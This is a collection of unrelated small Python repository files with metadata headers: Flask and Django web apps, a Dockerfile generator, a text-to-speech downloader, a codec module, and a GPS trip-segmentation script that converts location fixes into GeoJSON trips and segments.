994e88ad0fb61fca619824198737c810bcf2abc8 | b4d84e260df6df98dd20087ef28b185f1e232515 | /climate.py | 039303c2437813220aa84bacf5384e6d15a87d2d | [] | no_license | DanBoulden/Homework_06_in_progress | e3d6a9574b42462c548b27e165a3f691d517aa7a | 9daea3d46d50dd17d88849db5fe3db40cfe277eb | refs/heads/master | 2020-04-15T01:03:24.990030 | 2019-02-06T01:58:53 | 2019-02-06T01:58:53 | 164,262,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,093 | py | import numpy as np
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
#################################################
# Database Setup
#################################################
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# Reflect the existing database into automapped model classes.
Base = automap_base()
# reflect the tables
Base.prepare(engine, reflect=True)
# References to the automapped tables.
Measurement = Base.classes.measurement
Station = Base.classes.station
# Session linking Python to the DB.
# NOTE(review): a single module-level session is shared across all requests
# -- confirm that is acceptable for this app's concurrency needs.
session = Session(engine)
#################################################
# Flask Setup
#################################################
app = Flask(__name__)
#################################################
# Flask Routes
#################################################
@app.route("/")
def welcome():
    """List all available api routes."""
    # NOTE(review): "/" is also registered by home() below; only one of the
    # two handlers will actually serve this rule -- confirm which is intended.
    return (
        f"Available Routes:<br/>"
        f"Avalable routes:<br/>"
        f"Avalable pathes = /api/v1.0<br/>"
        f" /api/v1.0/Measurement<br/>"
        f" /api/v1.0/Station<br/>"
        f" /api/v1.0/precipitation<br/>"
        f" /api/v1.0/station<br/>"
        f" /api/v1.0/tob<br/>"
    )
@app.route("/")
def home():
    """Landing page listing available routes.

    NOTE(review): duplicates the "/" rule registered by welcome() above --
    one of the two registrations is redundant; confirm which should remain.
    """
    return (
        f"Hi, this is the Hawaii climate site<br/>"
        f"Avalable routes:<br/>"
        f"Avalable pathes = /api/v1.0<br/>"
        f" /api/v1.0/Measurement<br/>"
        f" /api/v1.0/Station<br/>"
        f" /api/v1.0/precipitation<br/>"
        f" /api/v1.0/station<br/>"
        f" /api/v1.0/tob<br/>"
    )
@app.route("/v1.0")
def ver():
    """List the v1.0 endpoints.

    NOTE(review): the listed paths start with /api/v1.0 but the registered
    routes below use /v1.0 -- the displayed paths look out of date.
    """
    return (
        f"This is the Hawaii climate site, version 1.0<br/>"
        f"Avalable routes:<br/>"
        f"Avalable pathes for v1.0<br/>"
        f" /api/v1.0/Measurement<br/>"
        f" /api/v1.0/Station<br/>"
        f" /api/v1.0/precipitation<br/>"
        f" /api/v1.0/stations<br/>"
        f" /api/v1.0/tobs<br/>"
    )
@app.route("/v1.0/Measurement")
def Measurement():
    # NOTE(review): this def rebinds the module-level name `Measurement`
    # (previously the automapped table class), so jsonify() receives this
    # view function itself and will fail at request time -- rename one of
    # the two and return serializable query results instead.
    return jsonify(Measurement)
@app.route("/v1.0/Station")
def Station():
    # NOTE(review): same shadowing problem as the Measurement route -- this
    # def replaces the automapped `Station` class, and jsonify() cannot
    # serialize the view function it now receives.
    return jsonify(Station)
@app.route("/v1.0/precipitation")
def precipitation():
    """Placeholder endpoint: precipitation data not implemented yet."""
    return(
        f"This is the Hawaii climate site, version 1.0: precipitation<br/>"
        f"This is still under construction<br/>"
    )
@app.route("/v1.0/stations")
def stations():
    """Placeholder for the stations endpoint (not implemented yet)."""
    parts = [
        "This is the Hawaii climate site, version 1.0: stations<br/>",
        "This is still under construction<br/>",
    ]
    return "".join(parts)
@app.route("/v1.0/tobs")
def tobs():
    """Placeholder for the temperature-observations endpoint (not implemented yet)."""
    parts = [
        "This is the Hawaii climate site, version 1.0: tobs<br/>",
        "This is still under construction<br/>",
    ]
    return "".join(parts)
if __name__ == '__main__':
    # Run the Flask development server (debug mode: auto-reload, tracebacks).
    app.run(debug=True)
| [
"noreply@github.com"
] | noreply@github.com |
d42d791d901f6b9f7548b186742945a2cd24936b | 8d90cdd61cfb7f42b8ba90c0cf284add19922781 | /project/infrastracture/make_dockerfile.py | a6aaf0da60828b82ba9398b103847736e5b4f033 | [
"MIT"
] | permissive | MCYP-UniversidadReyJuanCarlos/19-20_dalobe | e64b9ce3d19fbfaceb1398884bff49790babf62f | 43b64744d8011af6ccd62fee394d6af2b11cac68 | refs/heads/master | 2021-06-28T19:59:31.794342 | 2020-08-31T16:16:25 | 2020-08-31T16:16:25 | 230,571,914 | 4 | 0 | MIT | 2021-05-06T20:22:20 | 2019-12-28T06:57:09 | CSS | UTF-8 | Python | false | false | 1,766 | py | import uuid
class Make_dockerfile:
    """Helpers that assemble and write Dockerfiles from scan results.

    Fixes applied to the original:
    - every method is namespace-level (none took ``self``) but was not
      declared ``@staticmethod``; they now are, which keeps existing
      ``Make_dockerfile.method(...)`` call sites working and also makes
      them safe to call on instances;
    - files are opened with ``with`` so handles are closed even when a
      write raises (they previously leaked on error);
    - side-effect list comprehensions are replaced by plain loops.
    """

    @staticmethod
    def write_docker_file_from_dynamic(container, dockerfile_fixes):
        """Write output/Dockerfile for a running container: a FROM line for
        the container's image followed by every fix snippet."""
        image = container.image
        with open('output/Dockerfile', mode='wt', encoding='utf-8') as f:
            f.write("FROM " + str(image.attrs.get('RepoTags')[0]) + "\n\n")
            for fix in dockerfile_fixes:
                f.write(fix['content'])

    @staticmethod
    def write_docker_file_from_static(instructions, dockerfile_fixes):
        """Merge parsed instructions with their fixes, write the result to
        output/Dockerfile and return the merged instruction list."""
        proposed = Make_dockerfile.generate_proposed_dockerfile(instructions, dockerfile_fixes)
        with open('output/Dockerfile', mode='wt', encoding='utf-8') as f:
            for instruction in proposed:
                f.write(instruction['content'])
        return proposed

    @staticmethod
    def generate_proposed_dockerfile(instructions, dockerfile_fixes):
        """Return the proposed instruction list: each original instruction is
        replaced by the first fix targeting its startline; fixes without a
        startline are appended at the end as new instructions."""
        fixed_lines = Make_dockerfile.get_lines_with_fixes(dockerfile_fixes)
        proposed = []
        for instruction in instructions:
            if instruction['startline'] in fixed_lines:
                # First fix whose startline matches replaces the instruction.
                proposed.append(next(
                    o for o in dockerfile_fixes
                    if 'startline' in o and o['startline'] == instruction['startline']))
            else:
                proposed.append(instruction)
        # Fixes with no startline are brand-new instructions, appended last.
        proposed.extend(o for o in dockerfile_fixes if 'startline' not in o)
        return proposed

    @staticmethod
    def get_lines_with_fixes(dockerfile_fixes):
        """Startlines of every fix that targets an existing instruction."""
        return [x['startline'] for x in dockerfile_fixes if 'startline' in x]

    @staticmethod
    def write_dockerfile(dockerfile):
        """Write `dockerfile` text under output/ with a random UUID name and
        return the relative path."""
        path = "output/" + str(uuid.uuid4())
        with open(path, "w") as temp_file:
            temp_file.write(dockerfile)
        return path
| [
"d.lopezb.2019@alumnos.urjc.es"
] | d.lopezb.2019@alumnos.urjc.es |
5375777a1964677416c8a6d7877ffd6f6a3704fd | 8dedd4fe372a350dbf016a309c7ddd142257611e | /conejo/lib/tts.py | 189c935042d968b788b7841934a8c829e0116423 | [] | no_license | castrofernandez/raspberry-pi | 034b5277ca6a96ce3e6b03afbdd1f7a085a570b4 | f9af19c2a8e1459c5e002b10cb5de781035a98bf | refs/heads/master | 2016-09-05T18:51:21.472457 | 2015-02-08T16:31:06 | 2015-02-08T16:31:06 | 16,258,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,026 | py | #!/usr/bin/python
#-*- mode: python; coding: utf-8 -*-
import urllib, urllib2
from os import path
#from pydub import AudioSegment
def obtenerMP3(idioma, mensaje, nombre = None, ruta = None):
    """Download a Google Translate TTS MP3 for `mensaje` in language `idioma`.

    Writes the audio to file `nombre` (defaults to the message with spaces
    replaced by underscores) and returns a "PLAY <path>" command string.

    NOTE(review): the trailing `if nombre != None` is always true at that
    point (nombre was just defaulted above), so the returned path is always
    taken from `ruta` — even when ruta is None, yielding "PLAY None".  It
    looks like the condition was meant to be `if ruta != None`; confirm.
    """
    base = "http://translate.google.com/translate_tts"
    valores = { 'q': mensaje, 'tl': idioma }
    data = urllib.urlencode(valores)
    peticion = urllib2.Request(base, data)
    # A browser-like User-Agent is sent; requests without one get rejected.
    peticion.add_header("User-Agent", "Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11" )
    respuesta = urllib2.urlopen(peticion)
    if (nombre == None):
        nombre = "_".join(mensaje.split())
    #aux = nombre + ".aux.mp3"
    # NOTE(review): this handle is never closed; wrap in try/finally.
    ofp = open(nombre, "wb")
    ofp.write(respuesta.read())
    # Increase volume (disabled pydub post-processing)
    #cancion = AudioSegment.from_mp3(aux)
    # Increase decibels
    #cancion = cancion + 10
    #cancion.export(nombre, "mp3")
    if nombre != None:
        nombre = ruta
    return "PLAY %s" % nombre
def procesarLista(idioma, fichero):
    """Generate one MP3 per line of `fichero` (one phrase per line).

    Each phrase is saved as "<phrase>.mp3" in the current directory via
    obtenerMP3().
    """
    ifp = open(fichero)
    for linea in ifp:
        linea = linea.strip()
        obtenerMP3(idioma, linea, nombre = linea + ".mp3")
    ifp.close()
    return
#if __name__=="__main__":
# import sys, argparse
# ejemplo = "%s --idioma ES --mensaje 'HOLA' --nombre fichero.mp3" % sys.argv[0]
# parser = argparse.ArgumentParser( description=ejemplo )
# parser.add_argument('--idioma', "-i", help = 'Idioma: Japonés = ja, Inglés = en, etc.', required = True )
# parser.add_argument('--mensaje', "-m", help = 'Texto a sintetizar.', default = None )
# parser.add_argument('--lista', "-l", help = 'Fichero a procesar, una frase por línea.', default = None )
# parser.add_argument('--nombre', "-n", help = 'Fichero de salida .mp3', default = None )
# args = parser.parse_args()
# if not args.mensaje==None:
# obtenerMP3(args.idioma, args.mensaje, args.nombre)
# elif not args.lista==None:
# procesarLista(args.idioma, args.lista)
# else:
# print "Introduza un mensaje (--mensaje) o una lista (--lista)."
| [
"castrofernandez@gmail.com"
] | castrofernandez@gmail.com |
6f8a8a50c61f791fef940b294a8727acd288d83c | 87a45d33ec91923fa2d299ca60e62cc48692241b | /mysite/settings.py | 5fb92d3ca47006ee609df4aaad2d72f1d181f68f | [] | no_license | reda-z/tutorial-project | 2b16348a21e50c85eb74f75be5bb209c00ed942f | 7fc776ba052ed265cd4e3148ee08fc4f8ffab2c3 | refs/heads/master | 2021-01-12T02:29:53.333570 | 2017-01-04T18:17:44 | 2017-01-04T18:17:44 | 78,040,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,107 | py | import os
gettext = lambda s: s
DATA_DIR = os.path.dirname(os.path.dirname(__file__))
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.17.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control; rotate it and
# load it from the environment before any deployment.
SECRET_KEY = '42p#j+4pu_ol_(op=uowd$i%mx1aruev0gx*k&(he8*7_4!&e9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# An empty ALLOWED_HOSTS is only accepted while DEBUG is True; list the
# served host names here before disabling DEBUG.
ALLOWED_HOSTS = []
# Application definition
ROOT_URLCONF = 'mysite.urls'
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'fr'
TIME_ZONE = 'Africa/Casablanca'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(DATA_DIR, 'media')
STATIC_ROOT = os.path.join(DATA_DIR, 'static')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'mysite', 'static'),
)
SITE_ID = 1
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'mysite', 'templates'),],
'OPTIONS': {
'context_processors': [
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.i18n',
'django.core.context_processors.debug',
'django.core.context_processors.request',
'django.core.context_processors.media',
'django.core.context_processors.csrf',
'django.core.context_processors.tz',
'sekizai.context_processors.sekizai',
'django.core.context_processors.static',
'cms.context_processors.cms_settings'
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader'
],
},
},
]
MIDDLEWARE_CLASSES = (
'cms.middleware.utils.ApphookReloadMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'cms.middleware.user.CurrentUserMiddleware',
'cms.middleware.page.CurrentPageMiddleware',
'cms.middleware.toolbar.ToolbarMiddleware',
'cms.middleware.language.LanguageCookieMiddleware'
)
INSTALLED_APPS = (
'djangocms_admin_style',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.admin',
'django.contrib.sites',
'django.contrib.sitemaps',
'django.contrib.staticfiles',
'django.contrib.messages',
'cms',
'menus',
'sekizai',
'treebeard',
'djangocms_text_ckeditor',
'filer',
'easy_thumbnails',
'djangocms_column',
'djangocms_link',
'cmsplugin_filer_file',
'cmsplugin_filer_folder',
'cmsplugin_filer_image',
'cmsplugin_filer_utils',
'djangocms_style',
'djangocms_snippet',
'djangocms_googlemap',
'djangocms_video',
'mysite',
'bookstore',
)
LANGUAGES = (
## Customize this
('fr', gettext('fr')),
)
CMS_LANGUAGES = {
## Customize this
'default': {
'public': True,
'hide_untranslated': False,
'redirect_on_fallback': True,
},
1: [
{
'public': True,
'code': 'fr',
'hide_untranslated': False,
'name': gettext('fr'),
'redirect_on_fallback': True,
},
],
}
CMS_TEMPLATES = (
## Customize this
('fullwidth.html', 'Fullwidth'),
('sidebar_left.html', 'Sidebar Left'),
('sidebar_right.html', 'Sidebar Right')
)
CMS_PERMISSION = True
CMS_PLACEHOLDER_CONF = {}
DATABASES = {
'default': {
'CONN_MAX_AGE': 0,
'ENGINE': 'django.db.backends.sqlite3',
'HOST': 'localhost',
'NAME': 'project.db',
'PASSWORD': '',
'PORT': '',
'USER': ''
}
}
MIGRATION_MODULES = {
}
THUMBNAIL_PROCESSORS = (
'easy_thumbnails.processors.colorspace',
'easy_thumbnails.processors.autocrop',
'filer.thumbnail_processors.scale_and_crop_with_subject_location',
'easy_thumbnails.processors.filters'
)
| [
"reda.zejli@gmail.com"
] | reda.zejli@gmail.com |
8f5bee079852dc9e9cd1c52553ced73e436572ca | e433c8e129234e41454a3f029e41251f17920fc0 | /home/migrations/0006_auto_20181120_1245.py | 87229c2304b061262c08f0d9675937947e094487 | [] | no_license | exabyteso/wagtail-demo | ab25cbfa2f9857190273ab952d4ab24f14fef214 | 1fbef9e4703902b1c50962d6f50bf0c814367cca | refs/heads/master | 2020-04-07T12:47:19.050913 | 2018-11-20T11:57:07 | 2018-11-20T11:57:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 660 | py | # Generated by Django 2.1.3 on 2018-11-20 09:45
from django.conf import settings
from django.db import migrations
class Migration(migrations.Migration):
    # Renames the page model HomePage to IndexPage; the listed dependencies
    # make sure the wagtail/contenttypes tables referencing it are migrated
    # first so Django can rewire the references.

    dependencies = [
        ('wagtailcore', '0040_page_draft_title'),
        ('wagtailforms', '0003_capitalizeverbose'),
        ('wagtailredirects', '0006_redirect_increase_max_length'),
        ('contenttypes', '0002_remove_content_type_name'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('home', '0005_auto_20181120_1143'),
    ]

    operations = [
        migrations.RenameModel(
            old_name='HomePage',
            new_name='IndexPage',
        ),
    ]
| [
"infoptwo@gmail.com"
] | infoptwo@gmail.com |
473e17e63cc27ca761242cf6b609a7acca46f363 | 26fae5c7fb11bffecbab2d5ddcd34cd4cec0cea1 | /PMDM/misitio/polls/serializers.py | 21c24e6fbfdadcfb3809168a5f0cfaafc65aae5a | [] | no_license | JorgeDuenasLerin/desarrollo-web | 75879d4a5bbc2ce3bab3b34016b970a1636dd53b | 2367a9be4af1c8e8e9c21700b9f70d20d6273718 | refs/heads/main | 2023-05-28T05:51:25.627808 | 2021-06-17T09:25:24 | 2021-06-17T09:25:24 | 314,196,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 429 | py | from django.contrib.auth.models import User, Group
from rest_framework import serializers
from .models import Question, Choice
class QuestionSerializer(serializers.HyperlinkedModelSerializer):
    """REST representation of a poll Question (text and publication date).

    NOTE(review): despite the Hyperlinked base class no 'url' field is
    listed, so serialized questions carry no self-link — confirm intent.
    """
    class Meta:
        model = Question
        fields = ['question_text', 'pub_date']
class ChoiceSerializer(serializers.HyperlinkedModelSerializer):
    """REST representation of a poll Choice (text and vote count).

    NOTE(review): no 'url' or question link is exposed, so choices cannot
    be traced back to their question through this serializer.
    """
    class Meta:
        model = Choice
        fields = ['choice_text', 'votes']
| [
"jorge.duenas.lerin@gmail.com"
] | jorge.duenas.lerin@gmail.com |
77160378e0aff096aa646eaca4addb171b24a317 | 59de7788673ade984b9c9fbc33664a7cbdba67d3 | /res_bw/scripts/common/lib/encodings/hz.py | fc3d801e512648fcedb54a7c040b1b2914c9941b | [] | no_license | webiumsk/WOT-0.9.15-CT | 3fa24ab37a6c91b7073034afb2f355efa5b7fe36 | fbd194fbaa6bdece51c7a68fc35bbb5257948341 | refs/heads/master | 2020-12-24T21:27:23.175774 | 2016-05-01T13:47:44 | 2016-05-01T13:47:44 | 57,600,180 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 1,131 | py | # 2016.05.01 15:29:55 Střední Evropa (letní čas)
# Embedded file name: scripts/common/Lib/encodings/hz.py
import _codecs_cn, codecs
import _multibytecodec as mbc
codec = _codecs_cn.getcodec('hz')
class Codec(codecs.Codec):
encode = codec.encode
decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder, codecs.IncrementalEncoder):
codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder, codecs.IncrementalDecoder):
codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
codec = codec
def getregentry():
return codecs.CodecInfo(name='hz', encode=Codec().encode, decode=Codec().decode, incrementalencoder=IncrementalEncoder, incrementaldecoder=IncrementalDecoder, streamreader=StreamReader, streamwriter=StreamWriter)
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\encodings\hz.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.05.01 15:29:55 Střední Evropa (letní čas)
| [
"info@webium.sk"
] | info@webium.sk |
e94d85abd6706eef8bb60e86ee3dcc66668f2edf | 3c943b9d0117bd9e06dde1ea8370ccb9582fb0c5 | /bwp/participant/models.py | a26cdaa339fd442a2606ad967a5431c5255d8665 | [] | no_license | lbt/boss-web-participant | e4f013bb13cd09e4c953b83922308d2ea57e2e76 | b2f89109f677c49f80333fecf2a1a31c5c1916b9 | refs/heads/master | 2023-04-28T01:48:01.230173 | 2021-04-29T13:09:08 | 2021-04-29T13:09:08 | 359,830,471 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,163 | py | from django.db import models
# class BOSS(models.Model):
# """The BOSS instance a Participant is connected to.
# """
# name = models.CharField(
# help_text="Name of the BOSS instance",
# max_length=80)
# config_name = models.CharField(
# help_text="Section name of the BOSS connection details in skynet.conf",
# max_length=80)
class Participant(models.Model):
    """A participant that can interact with BOSS.

    An instance of a Participant defines the AMQP queue used and the
    class that provides the consume.
    """
    # Human-readable participant name.
    name = models.CharField(
        help_text="Name",
        max_length=80)
    # AMQP queue this participant consumes from.
    queue = models.CharField(
        help_text="AMQP message queue being monitored",
        max_length=80)
    # boss = models.ForeignKey(BOSS)
    def store(self, wid):
        # Persist a workitem as a Job attached to this participant.
        # NOTE(review): no "db_participant" attribute is defined on this
        # model in this file — presumably attached by the consumer at
        # runtime; confirm, otherwise this should read self.job_set.
        self.db_participant.job_set.create(
            workitem=wid)
class Job(models.Model):
    """Stores a job for a Participant interaction with BOSS.
    """
    # Owning participant; jobs are removed together with their participant.
    participant = models.ForeignKey(Participant, on_delete=models.CASCADE)
    # Serialized BOSS process workitem handled by this job.
    workitem = models.JSONField(
        help_text="process workitem for a Participant interaction")
| [
"david.greaves@jolla.com"
] | david.greaves@jolla.com |
9f191ec4a9cd5f99bda20cd89210ad2823c881a6 | b7cb29e3d4ec89f294695a4405df322455bfdb62 | /Exercise13ParametersUnpackingVariables/ex13.py | 297af801f679508fc21acb1e1535d0a8c1483e10 | [
"MIT"
] | permissive | CaptShaw/learn-python-the-hard-way | 0e86e88615e60d6dddd189f87556cf30f844883e | 48328a126ab47fdac371c82b79dc2047541a4dd7 | refs/heads/master | 2020-04-10T08:39:20.580479 | 2018-12-08T10:00:22 | 2018-12-08T10:00:22 | 160,910,784 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | # -*- coding: UTF-8 -*-
from sys import argv
#script, first, second, third = argv
script = argv
#从用户输入中获得参数
first = raw_input(),
second = raw_input(),
third = raw_input()
print "The script is called:", script
print "Your first variable is:", first
print "Your second variable is:", second
print "Your third variable is:", third
| [
"remember_m1@qq.com"
] | remember_m1@qq.com |
6fae34308cd664decc0ad86974d5ad045c8d9d68 | 7af5288111965b8bbcdfcd21fcf9db1f2e886741 | /point_to_path_measurement.py | 742e4e4ebcc00750b26d9257ebc1950227237cc5 | [] | no_license | GeoTecINIT/CyclingPathAnalysis | fc65b506da5f9365ed1fa7595fa3e16a3e54c581 | fb54af19b6dd217ffd224b4ec87e18ab8045c35e | refs/heads/master | 2020-03-14T02:39:14.968754 | 2018-04-27T17:11:56 | 2018-04-27T17:11:56 | 131,403,393 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,722 | py | """
This script allow us to convert a list of coordinates into a string geometry
It does not consider the information of trips
It just considers location, distance and time
Author: Diego Pajarito
"""
import datetime
import data_setup as data
import geojson
from LatLon import LatLon, Latitude, Longitude
from geojson import FeatureCollection, Feature, LineString
import pandas as pd
location = data.getLocation()
measurement = data.getMeasurement()
def build_feature(ftr_geometry, ftr_properties):
    """Wrap a geometry and its properties in a GeoJSON Feature.

    Returns the Feature when it validates; otherwise prints it for
    debugging and returns False.
    """
    feature = Feature(properties=ftr_properties, geometry=ftr_geometry)
    if not feature.is_valid:
        print(feature)
        return False
    return feature
def get_start_stop_linestring(point):
    """Degenerate two-vertex LineString: the same point twice.

    Used for trips that consist of a single GPS fix.
    """
    return LineString([point, point])
def get_generic_linestring():
    """Tiny placeholder LineString near (0, 0).

    Emitted when a valid geometry cannot be built from the data.
    """
    start = (0, 0)
    end = (0.0001, 0.001)
    return LineString([start, end])
def build_trip_feature(properties, points):
    """Build a Feature for a whole trip from its ordered point list.

    Falls back to a degenerate start==stop line for single-point trips and
    to the generic placeholder line when the points yield an invalid
    LineString; both fallbacks are logged to stdout.
    """
    linestring = LineString(points)
    if linestring.is_valid:
        return build_feature(linestring, properties)
    if len(points) == 1:
        fallback = LineString(get_start_stop_linestring(points[0]))
        feature = build_feature(fallback, properties)
        print ("trip with only one point: " + str(properties))
        return feature
    fallback = LineString(get_generic_linestring())
    feature = build_feature(fallback, properties)
    print ("Trip with empty Linestring: " + str(properties))
    return feature
def build_segment_feature(properties, start_point, end_point):
    """Build a two-vertex segment Feature between consecutive fixes.

    Falls back to the generic placeholder line (and logs to stdout) when
    the pair does not form a valid LineString.
    """
    segment = LineString([start_point, end_point])
    if segment.is_valid:
        return build_feature(segment, properties)
    feature = build_feature(LineString(get_generic_linestring()), properties)
    print ("Segment with empty Linestring: " + str(properties))
    return feature
def get_distance(point1, point2):
    """Great-circle distance in metres between two (lon, lat, ...) tuples.

    LatLon.distance returns kilometres, hence the * 1000.
    """
    origin = LatLon(Latitude(point1[1]), Longitude(point1[0]))
    destination = LatLon(Latitude(point2[1]), Longitude(point2[0]))
    return origin.distance(destination) * 1000
def get_last_speed(device, time):
    """Most recent 'speed' measurement for `device` strictly before `time`.

    Reads the module-level `measurement` frame.  The stored value is
    multiplied by 3.6 — apparently a m/s -> km/h conversion (TODO confirm
    units).  Returns -1 when no earlier measurement exists.

    BUG fix: the original tested ``values.size > 1``; DataFrame.size counts
    cells (rows * columns), so it only meant "has rows" by accident while
    the frame had several columns.  The row count is now tested explicitly.
    """
    values = measurement[measurement.measurement == 'speed']
    values = values[values.device == device]
    values = values[values.time_device < time]
    if len(values) > 0:
        values_sort = values.sort_values('time_device', ascending=False)
        return values_sort['value'].iloc[0] * 3.6
    return -1
def get_last_distance_a(device, time):
    """Most recent 'distance' measurement for `device` strictly before `time`.

    Reads the module-level `measurement` frame; returns the raw sensor
    value, or -1 when the device has no earlier 'distance' measurement.

    BUG fix: the original tested ``values.size > 1`` (cells, not rows),
    which only meant "has rows" by accident; the row count is now tested
    explicitly.
    """
    values = measurement[measurement.measurement == 'distance']
    values = values[values.device == device]
    values = values[values.time_device < time]
    if len(values) > 0:
        values_sort = values.sort_values('time_device', ascending=False)
        return values_sort['value'].iloc[0]
    return -1
def get_last_distance_b(device, time):
    """Most recent 'last_distance' measurement for `device` before `time`.

    Reads the module-level `measurement` frame; returns the raw sensor
    value, or -1 when the device has no earlier 'last_distance' entry.

    BUG fix: the original tested ``values.size > 1`` (cells, not rows),
    which only meant "has rows" by accident; the row count is now tested
    explicitly.
    """
    values = measurement[measurement.measurement == 'last_distance']
    values = values[values.device == device]
    values = values[values.time_device < time]
    if len(values) > 0:
        values_sort = values.sort_values('time_device', ascending=False)
        return values_sort['value'].iloc[0]
    return -1
def main():
    """Convert raw GPS fixes into trip and segment GeoJSON files.

    Walks the module-level `location` frame ordered by (device, time_gps).
    A new trip starts whenever consecutive fixes are more than 500 m or
    5 minutes apart, or belong to a different device.  Inside a trip each
    consecutive pair of fixes becomes a segment feature enriched with the
    last sensor-reported speed/distance measurements.  Results are written
    to ./output/trips_raw.geojson and ./output/segments_raw.geojson.

    BUG fix: the final status line used "%" with a set literal
    ({location.size, ...}) instead of a tuple, which raised a TypeError
    once processing finished; a proper argument tuple is now passed.
    """
    trip_points = []
    feature_segments = []
    feature_trips = []
    new_trip = True
    trip_count = 0
    location_sort = location.sort_values(['device', 'time_gps'])
    for i, row in location_sort.iterrows():
        # i is the original frame label, so label-indexing `location`
        # returns the same row that `location_sort` is visiting.
        lat = location['latitude'][i]
        lon = location['longitude'][i]
        alt = location['altitude'][i]
        device = location['device'][i]
        precision = location['precision'][i]
        timestamp = pd.to_datetime(location_sort['time_gps'][i])
        point = (lon, lat, alt)
        if new_trip:
            # Very first fix: open the first trip and segment.
            new_trip = False
            segment_count = 1
            trip_count = trip_count + 1
            trip_points.append(point)
            segment_start = timestamp
            trip_start = timestamp
            last_point = point
            last_device = device
            last_timestamp = timestamp
        else:
            distance = get_distance(last_point, point)
            time_difference_min = pd.Timedelta(timestamp - last_timestamp).total_seconds() / 60
            if distance > 500 or time_difference_min > 5 or last_device != device:
                # Gap or device change: close the current trip, open a new one.
                properties_trip = {'device': last_device, 'start_time': str(trip_start), 'end_time': str(last_timestamp),
                                   'trip_count': trip_count, 'point_count': len(trip_points)}
                feature_trip = build_trip_feature(properties_trip, trip_points)
                if feature_trip:
                    feature_trips.append(feature_trip)
                trip_count = trip_count + 1
                trip_start = timestamp
                trip_points = [point]
                segment_start = timestamp
                segment_count = 1
                last_point = point
                last_device = device
                last_timestamp = timestamp
            else:
                # Same trip: emit a segment between previous and current fix.
                last_distance_a = get_last_distance_a(device, location_sort['time_gps'][i])
                last_distance_b = get_last_distance_b(device, location_sort['time_gps'][i])
                last_speed = get_last_speed(device, location_sort['time_gps'][i])
                if time_difference_min == 0:
                    speed_geometry = 0
                else:
                    # km travelled over hours elapsed -> km/h from geometry alone.
                    speed_geometry = (distance / 1000) / (time_difference_min / 60)
                properties_segment = {'device': device, 'start_time': str(segment_start), 'end_time': str(timestamp),
                                      'segment_count': segment_count, 'distance_geometry': distance,
                                      'last_distance_a': last_distance_a, 'last_distance_b': last_distance_b,
                                      'speed_geometry': speed_geometry, 'last_speed': last_speed,
                                      'precision_end': precision, 'trip_count': trip_count}
                feature_segment = build_segment_feature(properties_segment, last_point, point)
                if feature_segment:
                    feature_segments.append(feature_segment)
                trip_points.append(point)
                segment_start = timestamp
                segment_count = segment_count + 1
                last_point = point
                last_device = device
                last_timestamp = timestamp
    # Close the trip that was still open when the data ran out.
    properties_trip = {'device': last_device, 'start_time': str(trip_start), 'end_time': str(last_timestamp),
                       'trip_count': trip_count, 'point_count': len(trip_points)}
    feature_trip = build_trip_feature(properties_trip, trip_points)
    if feature_trip:
        feature_trips.append(feature_trip)
    feature_collection_trips = FeatureCollection(feature_trips)
    print("Trips Feature collection is valid: " + str(feature_collection_trips.is_valid))
    with open('./output/trips_raw.geojson', 'w') as outfile:
        geojson.dump(feature_collection_trips, outfile)
    feature_collection_segments = FeatureCollection(feature_segments)
    print("Segments Feature collection is valid: " + str(feature_collection_segments.is_valid))
